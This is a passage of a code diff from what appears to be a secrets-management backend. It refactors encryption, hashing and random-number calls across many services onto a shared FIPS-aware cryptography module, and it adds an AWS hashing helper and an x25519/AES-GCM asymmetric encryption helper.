+import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
 import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors";
 import { groupBy, pick, unique } from "@app/lib/fn";
 import { setKnexStringValue } from "@app/lib/knex";
@@ -820,11 +820,12 @@ export const secretApprovalRequestServiceFactory = ({
                 type: SecretType.Shared,
                 references: botKey
                   ? getAllNestedSecretReferences(
-                      decryptSymmetric128BitHexKeyUTF8({
+                      crypto.encryption().symmetric().decrypt({
                         ciphertext: el.secretValueCiphertext,
                         iv: el.secretValueIV,
                         tag: el.secretValueTag,
-                        key: botKey
+                        key: botKey,
+                        keySize: SymmetricKeySize.Bits128
                       })
                     )
                   : undefined
@@ -865,11 +866,12 @@ export const secretApprovalRequestServiceFactory = ({
                   ]),
                   references: botKey
                     ? getAllNestedSecretReferences(
-                        decryptSymmetric128BitHexKeyUTF8({
+                        crypto.encryption().symmetric().decrypt({
                           ciphertext: el.secretValueCiphertext,
                           iv: el.secretValueIV,
                           tag: el.secretValueTag,
-                          key: botKey
+                          key: botKey,
+                          keySize: SymmetricKeySize.Bits128
                         })
                       )
                     : undefined

backend/src/ee/services/secret-replication/secret-replication-service.ts

@@ -3,7 +3,7 @@ import { TSecretApprovalPolicyServiceFactory } from "@app/ee/services/secret-app
 import { TSecretApprovalRequestDALFactory } from "@app/ee/services/secret-approval-request/secret-approval-request-dal";
 import { TSecretApprovalRequestSecretDALFactory } from "@app/ee/services/secret-approval-request/secret-approval-request-secret-dal";
 import { KeyStorePrefixes, TKeyStoreFactory } from "@app/keystore/keystore";
-import { decryptSymmetric128BitHexKeyUTF8 } from "@app/lib/crypto";
+import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
 import { NotFoundError } from "@app/lib/errors";
 import { groupBy, unique } from "@app/lib/fn";
 import { logger } from "@app/lib/logger";
@@ -100,18 +100,20 @@ const getReplicationKeyLockPrefix = (projectId: string, environmentSlug: string,
 export const getReplicationFolderName = (importId: string) => `${ReservedFolders.SecretReplication}${importId}`;
 
 const getDecryptedKeyValue = (key: string, secret: TSecrets) => {
-  const secretKey = decryptSymmetric128BitHexKeyUTF8({
+  const secretKey = crypto.encryption().symmetric().decrypt({
     ciphertext: secret.secretKeyCiphertext,
     iv: secret.secretKeyIV,
     tag: secret.secretKeyTag,
-    key
+    key,
+    keySize: SymmetricKeySize.Bits128
   });
 
-  const secretValue = decryptSymmetric128BitHexKeyUTF8({
+  const secretValue = crypto.encryption().symmetric().decrypt({
     ciphertext: secret.secretValueCiphertext,
     iv: secret.secretValueIV,
     tag: secret.secretValueTag,
-    key
+    key,
+    keySize: SymmetricKeySize.Bits128
   });
   return { key: secretKey, value: secretValue };
 };

backend/src/ee/services/secret-rotation-v2/shared/utils/index.ts

@@ -1,4 +1,4 @@
-import { randomInt } from "crypto";
+import { crypto } from "@app/lib/crypto/cryptography";
 
 type TPasswordRequirements = {
   length: number;
@@ -39,7 +39,7 @@ export const generatePassword = (passwordRequirements?: TPasswordRequirements) =
       parts.push(
         ...Array(required.lowercase)
           .fill(0)
-          .map(() => chars.lowercase[randomInt(chars.lowercase.length)])
+          .map(() => chars.lowercase[crypto.randomInt(chars.lowercase.length)])
       );
     }
 
@@ -47,7 +47,7 @@ export const generatePassword = (passwordRequirements?: TPasswordRequirements) =
       parts.push(
         ...Array(required.uppercase)
           .fill(0)
-          .map(() => chars.uppercase[randomInt(chars.uppercase.length)])
+          .map(() => chars.uppercase[crypto.randomInt(chars.uppercase.length)])
       );
     }
 
@@ -55,7 +55,7 @@ export const generatePassword = (passwordRequirements?: TPasswordRequirements) =
       parts.push(
         ...Array(required.digits)
           .fill(0)
-          .map(() => chars.digits[randomInt(chars.digits.length)])
+          .map(() => chars.digits[crypto.randomInt(chars.digits.length)])
       );
     }
 
@@ -63,7 +63,7 @@ export const generatePassword = (passwordRequirements?: TPasswordRequirements) =
       parts.push(
         ...Array(required.symbols)
           .fill(0)
-          .map(() => chars.symbols[randomInt(chars.symbols.length)])
+          .map(() => chars.symbols[crypto.randomInt(chars.symbols.length)])
       );
     }
 
@@ -78,12 +78,12 @@ export const generatePassword = (passwordRequirements?: TPasswordRequirements) =
     parts.push(
       ...Array(remainingLength)
         .fill(0)
-        .map(() => allowedChars[randomInt(allowedChars.length)])
+        .map(() => allowedChars[crypto.randomInt(allowedChars.length)])
     );
 
     // shuffle the array to mix up the characters
     for (let i = parts.length - 1; i > 0; i -= 1) {
-      const j = randomInt(i + 1);
+      const j = crypto.randomInt(i + 1);
       [parts[i], parts[j]] = [parts[j], parts[i]];
     }
 

backend/src/ee/services/secret-rotation/secret-rotation-queue/secret-rotation-queue.ts

@@ -6,8 +6,9 @@ import {
 } from "@aws-sdk/client-iam";
 
 import { SecretType } from "@app/db/schemas";
+import { CustomAWSHasher } from "@app/lib/aws/hashing";
 import { getConfig } from "@app/lib/config/env";
-import { encryptSymmetric128BitHexKeyUTF8 } from "@app/lib/crypto/encryption";
+import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
 import { daysToMillisecond, secondsToMillis } from "@app/lib/dates";
 import { NotFoundError } from "@app/lib/errors";
 import { logger } from "@app/lib/logger";
@@ -117,6 +118,7 @@ export const secretRotationQueueFactory = ({
   queue.start(QueueName.SecretRotation, async (job) => {
     const { rotationId } = job.data;
     const appCfg = getConfig();
+
     logger.info(`secretRotationQueue.process: [rotationDocument=${rotationId}]`);
     const secretRotation = await secretRotationDAL.findById(rotationId);
     const rotationProvider = rotationTemplates.find(({ name }) => name === secretRotation?.provider);
@@ -225,6 +227,8 @@ export const secretRotationQueueFactory = ({
       if (provider.template.type === TProviderFunctionTypes.AWS) {
         if (provider.template.client === TAwsProviderSystems.IAM) {
           const client = new IAMClient({
+            useFipsEndpoint: crypto.isFipsModeEnabled(),
+            sha256: CustomAWSHasher,
             region: newCredential.inputs.manager_user_aws_region as string,
             credentials: {
               accessKeyId: newCredential.inputs.manager_user_access_key as string,
@@ -365,15 +369,22 @@ export const secretRotationQueueFactory = ({
           throw new NotFoundError({
             message: `Project bot not found for project with ID '${secretRotation.projectId}'`
           });
+
         const encryptedSecrets = rotationOutputs.map(({ key: outputKey, secretId }) => ({
           secretId,
-          value: encryptSymmetric128BitHexKeyUTF8(
+          value: crypto
-            typeof newCredential.outputs[outputKey] === "object"
+            .encryption()
-              ? JSON.stringify(newCredential.outputs[outputKey])
+            .symmetric()
-              : String(newCredential.outputs[outputKey]),
+            .encrypt({
-            botKey
+              plaintext:
-          )
+                typeof newCredential.outputs[outputKey] === "object"
+                  ? JSON.stringify(newCredential.outputs[outputKey])
+                  : String(newCredential.outputs[outputKey]),
+              key: botKey,
+              keySize: SymmetricKeySize.Bits128
+            })
         }));
+
         // map the final values to output keys in the board
         await secretRotationDAL.transaction(async (tx) => {
           await secretRotationDAL.updateById(

backend/src/ee/services/secret-rotation/secret-rotation-service.ts

@@ -2,7 +2,7 @@ import { ForbiddenError, subject } from "@casl/ability";
 import Ajv from "ajv";
 
 import { ProjectVersion, TableName } from "@app/db/schemas";
-import { decryptSymmetric128BitHexKeyUTF8 } from "@app/lib/crypto/encryption";
+import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
 import { BadRequestError, NotFoundError } from "@app/lib/errors";
 import { TProjectPermission } from "@app/lib/types";
 import { TKmsServiceFactory } from "@app/services/kms/kms-service";
@@ -227,6 +227,7 @@ export const secretRotationServiceFactory = ({
 
     if (!botKey) throw new NotFoundError({ message: `Project bot not found for project with ID '${projectId}'` });
     const docs = await secretRotationDAL.find({ projectId });
+
     return docs.map((el) => ({
       ...el,
       outputs: el.outputs.map((output) => ({
@@ -234,11 +235,12 @@ export const secretRotationServiceFactory = ({
         secret: {
           id: output.secret.id,
           version: output.secret.version,
-          secretKey: decryptSymmetric128BitHexKeyUTF8({
+          secretKey: crypto.encryption().symmetric().decrypt({
             ciphertext: output.secret.secretKeyCiphertext,
             iv: output.secret.secretKeyIV,
             tag: output.secret.secretKeyTag,
-            key: botKey
+            key: botKey,
+            keySize: SymmetricKeySize.Bits128
           })
         }
       }))

backend/src/ee/services/secret-scanning-v2/bitbucket/bitbucket-secret-scanning-service.ts

@@ -1,8 +1,7 @@
-import crypto from "crypto";
-
 import { TSecretScanningV2DALFactory } from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-dal";
 import { SecretScanningDataSource } from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-enums";
 import { TSecretScanningV2QueueServiceFactory } from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-queue";
+import { crypto } from "@app/lib/crypto";
 import { logger } from "@app/lib/logger";
 import { TKmsServiceFactory } from "@app/services/kms/kms-service";
 import { KmsDataKey } from "@app/services/kms/kms-types";
@@ -67,7 +66,7 @@ export const bitbucketSecretScanningService = (
 
     const credentials = JSON.parse(decryptedCredentials.toString()) as TBitbucketDataSourceCredentials;
 
-    const hmac = crypto.createHmac("sha256", credentials.webhookSecret);
+    const hmac = crypto.rawCrypto.createHmac("sha256", credentials.webhookSecret);
     hmac.update(bodyString);
     const calculatedSignature = hmac.digest("hex");
 

backend/src/ee/services/secret-scanning/secret-scanning-service.ts

@@ -1,5 +1,3 @@
-import crypto from "node:crypto";
-
 import { ForbiddenError } from "@casl/ability";
 import { WebhookEventMap } from "@octokit/webhooks-types";
 import { ProbotOctokit } from "probot";
@@ -7,6 +5,7 @@ import { ProbotOctokit } from "probot";
 import { OrgPermissionActions, OrgPermissionSubjects } from "@app/ee/services/permission/org-permission";
 import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types";
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { NotFoundError } from "@app/lib/errors";
 
 import { TGitAppDALFactory } from "./git-app-dal";

backend/src/ee/services/secret-snapshot/secret-snapshot-service.ts

@@ -3,7 +3,7 @@
 import { ForbiddenError } from "@casl/ability";
 
 import { TableName, TSecretTagJunctionInsert, TSecretV2TagJunctionInsert } from "@app/db/schemas";
-import { decryptSymmetric128BitHexKeyUTF8 } from "@app/lib/crypto";
+import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
 import { InternalServerError, NotFoundError } from "@app/lib/errors";
 import { groupBy } from "@app/lib/fn";
 import { logger } from "@app/lib/logger";
@@ -233,14 +233,16 @@ export const secretSnapshotServiceFactory = ({
       const { botKey } = await projectBotService.getBotKey(snapshot.projectId);
       if (!botKey)
         throw new NotFoundError({ message: `Project bot key not found for project with ID '${snapshot.projectId}'` });
+
       snapshotDetails = {
         ...encryptedSnapshotDetails,
         secretVersions: encryptedSnapshotDetails.secretVersions.map((el) => {
-          const secretKey = decryptSymmetric128BitHexKeyUTF8({
+          const secretKey = crypto.encryption().symmetric().decrypt({
             ciphertext: el.secretKeyCiphertext,
             iv: el.secretKeyIV,
             tag: el.secretKeyTag,
-            key: botKey
+            key: botKey,
+            keySize: SymmetricKeySize.Bits128
           });
 
           const canReadValue = hasSecretReadValueOrDescribePermission(
@@ -257,11 +259,12 @@ export const secretSnapshotServiceFactory = ({
           let secretValue = "";
 
           if (canReadValue) {
-            secretValue = decryptSymmetric128BitHexKeyUTF8({
+            secretValue = crypto.encryption().symmetric().decrypt({
               ciphertext: el.secretValueCiphertext,
               iv: el.secretValueIV,
               tag: el.secretValueTag,
-              key: botKey
+              key: botKey,
+              keySize: SymmetricKeySize.Bits128
             });
           } else {
             secretValue = INFISICAL_SECRET_VALUE_HIDDEN_MASK;
@@ -274,11 +277,12 @@ export const secretSnapshotServiceFactory = ({
             secretValue,
             secretComment:
               el.secretCommentTag && el.secretCommentIV && el.secretCommentCiphertext
-                ? decryptSymmetric128BitHexKeyUTF8({
+                ? crypto.encryption().symmetric().decrypt({
                     ciphertext: el.secretCommentCiphertext,
                     iv: el.secretCommentIV,
                     tag: el.secretCommentTag,
-                    key: botKey
+                    key: botKey,
+                    keySize: SymmetricKeySize.Bits128
                   })
                 : ""
           };

backend/src/ee/services/ssh/ssh-certificate-authority-fns.ts

@@ -1,5 +1,4 @@
 import { execFile } from "child_process";
-import crypto from "crypto";
 import { promises as fs } from "fs";
 import { Knex } from "knex";
 import os from "os";
@@ -9,6 +8,7 @@ import { promisify } from "util";
 
 import { TSshCertificateTemplates } from "@app/db/schemas";
 import { SshCertKeyAlgorithm } from "@app/ee/services/ssh-certificate/ssh-certificate-types";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError } from "@app/lib/errors";
 import { ms } from "@app/lib/ms";
 import { CharacterType, characterValidator } from "@app/lib/validator/validate-string";

backend/src/lib/aws/hashing.ts

@@ -0,0 +1,57 @@
+/* eslint-disable no-underscore-dangle */
+import type { SourceData } from "@smithy/types";
+import { Hash, Hmac } from "crypto";
+
+import { crypto } from "@app/lib/crypto";
+
+export class CustomAWSHasher {
+  public algorithmIdentifier: string = "sha256";
+
+  public secret: SourceData | undefined;
+
+  public hash: Hash | Hmac | undefined;
+
+  private _hash: Hash | Hmac | undefined;
+
+  constructor(secret?: SourceData) {
+    this.secret = secret;
+    this.reset();
+  }
+
+  reset() {
+    if (this.secret) {
+      // Convert any secret type to Buffer
+      let secretBuffer = this.secret as Buffer;
+      if (this.secret instanceof ArrayBuffer) {
+        secretBuffer = Buffer.from(this.secret);
+      } else if (ArrayBuffer.isView && ArrayBuffer.isView(this.secret)) {
+        secretBuffer = Buffer.from(this.secret.buffer, this.secret.byteOffset, this.secret.byteLength);
+      }
+      this._hash = crypto.rawCrypto.createHmac(this.algorithmIdentifier, secretBuffer);
+    } else {
+      this._hash = crypto.rawCrypto.createHash(this.algorithmIdentifier);
+    }
+    return this;
+  }
+
+  update(data: SourceData) {
+    // Handle all possible data types
+    let buffer: Buffer = data as Buffer;
+    if (typeof data === "string") {
+      buffer = Buffer.from(data, "utf8");
+    } else if (data instanceof ArrayBuffer) {
+      buffer = Buffer.from(data);
+    } else if (ArrayBuffer.isView && ArrayBuffer.isView(data)) {
+      buffer = Buffer.from(data.buffer, data.byteOffset, data.byteLength);
+    }
+
+    this._hash?.update(buffer);
+    return this;
+  }
+
+  digest(): Promise<Uint8Array> {
+    const result = new Uint8Array(this._hash?.digest() || []);
+    this.reset();
+    return Promise.resolve(result);
+  }
+}

backend/src/lib/axios/digest-auth.ts

@@ -1,7 +1,7 @@
-import crypto from "node:crypto";
-
 import { AxiosError, AxiosInstance, AxiosRequestConfig } from "axios";
 
+import { crypto, DigestType } from "../crypto/cryptography";
+
 export const createDigestAuthRequestInterceptor = (
   axiosInstance: AxiosInstance,
   username: string,
@@ -30,18 +30,13 @@ export const createDigestAuthRequestInterceptor = (
       const cnonce = crypto.randomBytes(24).toString("hex");
       const realm = authDetails.find((el) => el[0].toLowerCase().indexOf("realm") > -1)?.[1]?.replaceAll('"', "") || "";
       const nonce = authDetails.find((el) => el[0].toLowerCase().indexOf("nonce") > -1)?.[1]?.replaceAll('"', "") || "";
-      const ha1 = crypto.createHash("md5").update(`${username}:${realm}:${password}`).digest("hex");
+      const ha1 = crypto.hashing().md5(`${username}:${realm}:${password}`, DigestType.Hex);
       const path = opts.url;
 
-      const ha2 = crypto
+      const ha2 = crypto.hashing().md5(`${opts.method ?? "GET"}:${path}`, DigestType.Hex);
-        .createHash("md5")
+
-        .update(`${opts.method ?? "GET"}:${path}`)
+      const response = crypto.hashing().md5(`${ha1}:${nonce}:${nonceCount}:${cnonce}:auth:${ha2}`, DigestType.Hex);
-        .digest("hex");
 
-      const response = crypto
-        .createHash("md5")
-        .update(`${ha1}:${nonce}:${nonceCount}:${cnonce}:auth:${ha2}`)
-        .digest("hex");
       const authorization = `Digest username="${username}",realm="${realm}",nonce="${nonce}",uri="${path}",qop="auth",algorithm="MD5",response="${response}",nc="${nonceCount}",cnonce="${cnonce}"`;
 
       if (opts.headers) {

backend/src/lib/config/env.ts

@@ -1,6 +1,8 @@
 import { z } from "zod";
 
+import { crypto } from "@app/lib/crypto/cryptography";
 import { QueueWorkerProfile } from "@app/lib/types";
+import { TSuperAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 import { BadRequestError } from "../errors";
 import { removeTrailingSlash } from "../fn";
@@ -65,7 +67,7 @@ const envSchema = z
     DB_PASSWORD: zpStr(z.string().describe("Postgres database password").optional()),
     DB_NAME: zpStr(z.string().describe("Postgres database name").optional()),
     DB_READ_REPLICAS: zpStr(z.string().describe("Postgres read replicas").optional()),
-    BCRYPT_SALT_ROUND: z.number().default(12),
+    BCRYPT_SALT_ROUND: z.number().optional(), // note(daniel): this is deprecated, use SALT_ROUNDS instead. only keeping this for backwards compatibility.
     NODE_ENV: z.enum(["development", "test", "production"]).default("production"),
     SALT_ROUNDS: z.coerce.number().default(10),
     INITIAL_ORGANIZATION_NAME: zpStr(z.string().optional()),
@@ -308,6 +310,7 @@ const envSchema = z
   )
   .transform((data) => ({
     ...data,
+    SALT_ROUNDS: data.SALT_ROUNDS || data.BCRYPT_SALT_ROUND || 12,
     DB_READ_REPLICAS: data.DB_READ_REPLICAS
       ? databaseReadReplicaSchema.parse(JSON.parse(data.DB_READ_REPLICAS))
       : undefined,
@@ -349,7 +352,7 @@ export const getConfig = () => envCfg;
 export const getOriginalConfig = () => originalEnvConfig;
 
 // cannot import singleton logger directly as it needs config to load various transport
-export const initEnvConfig = (logger?: CustomLogger) => {
+export const initEnvConfig = async (superAdminDAL?: TSuperAdminDALFactory, logger?: CustomLogger) => {
   const parsedEnv = envSchema.safeParse(process.env);
   if (!parsedEnv.success) {
     (logger ?? console).error("Invalid environment variables. Check the error below");
@@ -364,9 +367,70 @@ export const initEnvConfig = (logger?: CustomLogger) => {
     originalEnvConfig = config;
   }
 
+  if (superAdminDAL) {
+    const fipsEnabled = await crypto.initialize(superAdminDAL);
+
+    if (fipsEnabled) {
+      const newEnvCfg = {
+        ...parsedEnv.data,
+        ROOT_ENCRYPTION_KEY: envCfg.ENCRYPTION_KEY
+      };
+
+      delete newEnvCfg.ENCRYPTION_KEY;
+
+      envCfg = Object.freeze(newEnvCfg);
+    }
+  }
+
   return envCfg;
 };
 
+export const getTelemetryConfig = () => {
+  const parsedEnv = envSchema.safeParse(process.env);
+  if (!parsedEnv.success) {
+    console.error("Invalid environment variables. Check the error below");
+    console.error(parsedEnv.error.issues);
+    process.exit(-1);
+  }
+
+  return {
+    useOtel: parsedEnv.data.OTEL_TELEMETRY_COLLECTION_ENABLED,
+    useDataDogTracer: parsedEnv.data.SHOULD_USE_DATADOG_TRACER,
+    OTEL: {
+      otlpURL: parsedEnv.data.OTEL_EXPORT_OTLP_ENDPOINT,
+      otlpUser: parsedEnv.data.OTEL_COLLECTOR_BASIC_AUTH_USERNAME,
+      otlpPassword: parsedEnv.data.OTEL_COLLECTOR_BASIC_AUTH_PASSWORD,
+      otlpPushInterval: parsedEnv.data.OTEL_OTLP_PUSH_INTERVAL,
+      exportType: parsedEnv.data.OTEL_EXPORT_TYPE
+    },
+    TRACER: {
+      profiling: parsedEnv.data.DATADOG_PROFILING_ENABLED,
+      version: parsedEnv.data.INFISICAL_PLATFORM_VERSION,
+      env: parsedEnv.data.DATADOG_ENV,
+      service: parsedEnv.data.DATADOG_SERVICE,
+      hostname: parsedEnv.data.DATADOG_HOSTNAME
+    }
+  };
+};
+
+export const getDatabaseCredentials = (logger?: CustomLogger) => {
+  const parsedEnv = envSchema.safeParse(process.env);
+  if (!parsedEnv.success) {
+    (logger ?? console).error("Invalid environment variables. Check the error below");
+    (logger ?? console).error(parsedEnv.error.issues);
+    process.exit(-1);
+  }
+
+  return {
+    dbConnectionUri: parsedEnv.data.DB_CONNECTION_URI,
+    dbRootCert: parsedEnv.data.DB_ROOT_CERT,
+    readReplicas: parsedEnv.data.DB_READ_REPLICAS?.map((el) => ({
+      dbRootCert: el.DB_ROOT_CERT,
+      dbConnectionUri: el.DB_CONNECTION_URI
+    }))
+  };
+};
+
 // A list of environment variables that can be overwritten
 export const overwriteSchema: {
   [key: string]: {
@@ -564,7 +628,11 @@ export const overrideEnvConfig = (config: Record<string, string>) => {
   const parsedResult = envSchema.safeParse(tempEnv);
 
   if (parsedResult.success) {
-    envCfg = Object.freeze(parsedResult.data);
+    envCfg = Object.freeze({
+      ...parsedResult.data,
+      ENCRYPTION_KEY: envCfg.ENCRYPTION_KEY,
+      ROOT_ENCRYPTION_KEY: envCfg.ROOT_ENCRYPTION_KEY
+    });
   }
 };
 

backend/src/lib/crypto/cache.ts

@@ -1,8 +1,8 @@
-import crypto from "node:crypto";
+import { crypto } from "@app/lib/crypto/cryptography";
 
 export const generateCacheKeyFromData = (data: unknown) =>
-  crypto
+  crypto.rawCrypto
-    .createHash("md5")
+    .createHash("sha256")
     .update(JSON.stringify(data))
     .digest("base64")
     .replace(/\+/g, "-")

backend/src/lib/crypto/cipher/cipher.ts

@@ -1,24 +1,17 @@
-import crypto from "crypto";
+import { crypto } from "@app/lib/crypto/cryptography";
 
 import { SymmetricKeyAlgorithm, TSymmetricEncryptionFns } from "./types";
 
-const getIvLength = () => {
+const IV_LENGTH = 12;
-  return 12;
+const TAG_LENGTH = 16;
-};
-
-const getTagLength = () => {
-  return 16;
-};
 
+// todo(daniel): Decide if we should move this into the cryptography module
 export const symmetricCipherService = (
   type: SymmetricKeyAlgorithm.AES_GCM_128 | SymmetricKeyAlgorithm.AES_GCM_256
 ): TSymmetricEncryptionFns => {
-  const IV_LENGTH = getIvLength();
-  const TAG_LENGTH = getTagLength();
-
   const encrypt = (text: Buffer, key: Buffer) => {
     const iv = crypto.randomBytes(IV_LENGTH);
-    const cipher = crypto.createCipheriv(type, key, iv);
+    const cipher = crypto.rawCrypto.createCipheriv(type, key, iv);
 
     let encrypted = cipher.update(text);
     encrypted = Buffer.concat([encrypted, cipher.final()]);
@@ -37,7 +30,7 @@ export const symmetricCipherService = (
     const tag = ciphertextBlob.subarray(-TAG_LENGTH);
     const encrypted = ciphertextBlob.subarray(IV_LENGTH, -TAG_LENGTH);
 
-    const decipher = crypto.createDecipheriv(type, key, iv);
+    const decipher = crypto.rawCrypto.createDecipheriv(type, key, iv);
     decipher.setAuthTag(tag);
 
     const decrypted = Buffer.concat([decipher.update(encrypted), decipher.final()]);

backend/src/lib/crypto/cryptography/asymmetric-fips.ts

@@ -0,0 +1,138 @@
+import crypto, { KeyObject } from "node:crypto";
+
+import { SecretEncryptionAlgo } from "@app/db/schemas";
+import { CryptographyError } from "@app/lib/errors";
+import { logger } from "@app/lib/logger";
+
+export const asymmetricFipsValidated = () => {
+  const generateKeyPair = async () => {
+    const { publicKey, privateKey } = await new Promise<{ publicKey: KeyObject; privateKey: KeyObject }>((resolve) => {
+      crypto.generateKeyPair("x25519", undefined, (err, pubKey, privKey) => {
+        if (err) {
+          logger.error(err, "FIPS generateKeyPair: Failed to generate key pair");
+          throw new CryptographyError({
+            message: "Failed to generate key pair"
+          });
+        }
+        resolve({
+          publicKey: pubKey,
+          privateKey: privKey
+        });
+      });
+    });
+
+    return {
+      publicKey: publicKey.export({ type: "spki", format: "der" }).toString("base64"),
+      privateKey: privateKey.export({ type: "pkcs8", format: "der" }).toString("base64")
+    };
+  };
+
+  const encryptAsymmetric = (data: string, publicKey: string, privateKey: string) => {
+    const pubKeyObj = crypto.createPublicKey({
+      key: Buffer.from(publicKey, "base64"),
+      type: "spki",
+      format: "der"
+    });
+
+    const privKeyObj = crypto.createPrivateKey({
+      key: Buffer.from(privateKey, "base64"),
+      type: "pkcs8",
+      format: "der"
+    });
+
+    // Generate shared secret using x25519 curve
+    const sharedSecret = crypto.diffieHellman({
+      privateKey: privKeyObj,
+      publicKey: pubKeyObj
+    });
+
+    const nonce = crypto.randomBytes(24);
+
+    // Derive 32-byte key from shared secret
+    const key = crypto.createHash("sha256").update(sharedSecret).digest();
+
+    // Use first 12 bytes of nonce as IV for AES-GCM
+    const iv = nonce.subarray(0, 12);
+
+    // Encrypt with AES-256-GCM
+    const cipher = crypto.createCipheriv(SecretEncryptionAlgo.AES_256_GCM, key, iv);
+
+    const ciphertext = cipher.update(data, "utf8");
+    cipher.final();
+
+    const authTag = cipher.getAuthTag();
+
+    // Combine ciphertext and auth tag
+    const combined = Buffer.concat([ciphertext, authTag]);
+
+    return {
+      ciphertext: combined.toString("base64"),
+      nonce: nonce.toString("base64")
+    };
+  };
+
+  const decryptAsymmetric = ({
+    ciphertext,
+    nonce,
+    publicKey,
+    privateKey
+  }: {
+    ciphertext: string;
+    nonce: string;
+    publicKey: string;
+    privateKey: string;
+  }) => {
+    // Convert base64 keys back to key objects
+    const pubKeyObj = crypto.createPublicKey({
+      key: Buffer.from(publicKey, "base64"),
+      type: "spki",
+      format: "der"
+    });
+
+    const privKeyObj = crypto.createPrivateKey({
+      key: Buffer.from(privateKey, "base64"),
+      type: "pkcs8",
+      format: "der"
+    });
+
+    // Generate same shared secret
+    const sharedSecret = crypto.diffieHellman({
+      privateKey: privKeyObj,
+      publicKey: pubKeyObj
+    });
+
+    const nonceBuffer = Buffer.from(nonce, "base64");
+    const combinedBuffer = Buffer.from(ciphertext, "base64");
+
+    // Split ciphertext and auth tag (last 16 bytes for GCM)
+    const actualCiphertext = combinedBuffer.subarray(0, -16);
+    const authTag = combinedBuffer.subarray(-16);
+
+    // Derive same 32-byte key
+    const key = crypto.createHash("sha256").update(sharedSecret).digest();
+
+    // Use first 12 bytes of nonce as IV
+    const iv = nonceBuffer.subarray(0, 12);
+
+    // Decrypt
+    const decipher = crypto.createDecipheriv("aes-256-gcm", key, iv);
+    decipher.setAuthTag(authTag);
+
+    const plaintext = decipher.update(actualCiphertext);
+
+    try {
+      const final = decipher.final();
+      return Buffer.concat([plaintext, final]).toString("utf8");
+    } catch (error) {
+      throw new CryptographyError({
+        message: "Invalid ciphertext or keys"
+      });
+    }
+  };
+
+  return {
+    generateKeyPair,
+    encryptAsymmetric,
+    decryptAsymmetric
+  };
+};

backend/src/lib/crypto/cryptography/crypto.ts

@@ -0,0 +1,444 @@
+// NOTE: DO NOT USE crypto-js ANYWHERE EXCEPT THIS FILE.
+// We use crypto-js purely to get around our native node crypto FIPS restrictions in FIPS mode.
+
+import crypto, { subtle } from "node:crypto";
+
+import bcrypt from "bcrypt";
+import cryptoJs from "crypto-js";
+import jwtDep from "jsonwebtoken";
+import nacl from "tweetnacl";
+import naclUtils from "tweetnacl-util";
+
+import { SecretEncryptionAlgo, SecretKeyEncoding } from "@app/db/schemas";
+import { TLicenseServiceFactory } from "@app/ee/services/license/license-service";
+import { TSuperAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
+import { ADMIN_CONFIG_DB_UUID } from "@app/services/super-admin/super-admin-service";
+
+import { isBase64 } from "../../base64";
+import { getConfig } from "../../config/env";
+import { CryptographyError } from "../../errors";
+import { logger } from "../../logger";
+import { asymmetricFipsValidated } from "./asymmetric-fips";
+import { hasherFipsValidated } from "./hash-fips";
+import type { TDecryptAsymmetricInput, TDecryptSymmetricInput, TEncryptSymmetricInput } from "./types";
+import { DigestType, SymmetricKeySize } from "./types";
+
+const bytesToBits = (bytes: number) => bytes * 8;
+
+const IV_BYTES_SIZE = 12;
+const BLOCK_SIZE_BYTES_16 = 16;
+
+const generateAsymmetricKeyPairNoFipsValidation = () => {
+  const pair = nacl.box.keyPair();
+
+  return {
+    publicKey: naclUtils.encodeBase64(pair.publicKey),
+    privateKey: naclUtils.encodeBase64(pair.secretKey)
+  };
+};
+
+export const encryptAsymmetricNoFipsValidation = (plaintext: string, publicKey: string, privateKey: string) => {
+  const nonce = nacl.randomBytes(24);
+  const ciphertext = nacl.box(
+    naclUtils.decodeUTF8(plaintext),
+    nonce,
+    naclUtils.decodeBase64(publicKey),
+    naclUtils.decodeBase64(privateKey)
+  );
+
+  return {
+    ciphertext: naclUtils.encodeBase64(ciphertext),
+    nonce: naclUtils.encodeBase64(nonce)
+  };
+};
+
+const decryptAsymmetricNoFipsValidation = ({ ciphertext, nonce, publicKey, privateKey }: TDecryptAsymmetricInput) => {
+  const plaintext: Uint8Array | null = nacl.box.open(
+    naclUtils.decodeBase64(ciphertext),
+    naclUtils.decodeBase64(nonce),
+    naclUtils.decodeBase64(publicKey),
+    naclUtils.decodeBase64(privateKey)
+  );
+
+  if (plaintext == null) throw Error("Invalid ciphertext or keys");
+
+  return naclUtils.encodeUTF8(plaintext);
+};
+
+export const generateAsymmetricKeyPair = () => {
+  const pair = nacl.box.keyPair();
+
+  return {
+    publicKey: naclUtils.encodeBase64(pair.publicKey),
+    privateKey: naclUtils.encodeBase64(pair.secretKey)
+  };
+};
+
+export const computeMd5 = (message: string, digest: DigestType = DigestType.Hex) => {
+  let encoder;
+  switch (digest) {
+    case DigestType.Hex:
+      encoder = cryptoJs.enc.Hex;
+      break;
+    case DigestType.Base64:
+      encoder = cryptoJs.enc.Base64;
+      break;
+    default:
+      throw new CryptographyError({
+        message: `Invalid digest type: ${digest as string}`
+      });
+  }
+
+  return cryptoJs.MD5(message).toString(encoder);
+};
+
+const cryptographyFactory = () => {
+  let $fipsEnabled = false;
+  let $isInitialized = false;
+
+  const $checkIsInitialized = () => {
+    if (!$isInitialized) {
+      throw new CryptographyError({
+        message: "Internal cryptography module is not initialized"
+      });
+    }
+  };
+
+  const isFipsModeEnabled = (options: { skipInitializationCheck?: boolean } = {}) => {
+    if (!options?.skipInitializationCheck) {
+      $checkIsInitialized();
+    }
+    return $fipsEnabled;
+  };
+
+  const verifyFipsLicense = (licenseService: Pick<TLicenseServiceFactory, "onPremFeatures">) => {
+    if (isFipsModeEnabled({ skipInitializationCheck: true }) && !licenseService.onPremFeatures?.fips) {
+      throw new CryptographyError({
+        message: "FIPS mode is enabled but your license does not include FIPS support. Please contact support."
+      });
+    }
+  };
+
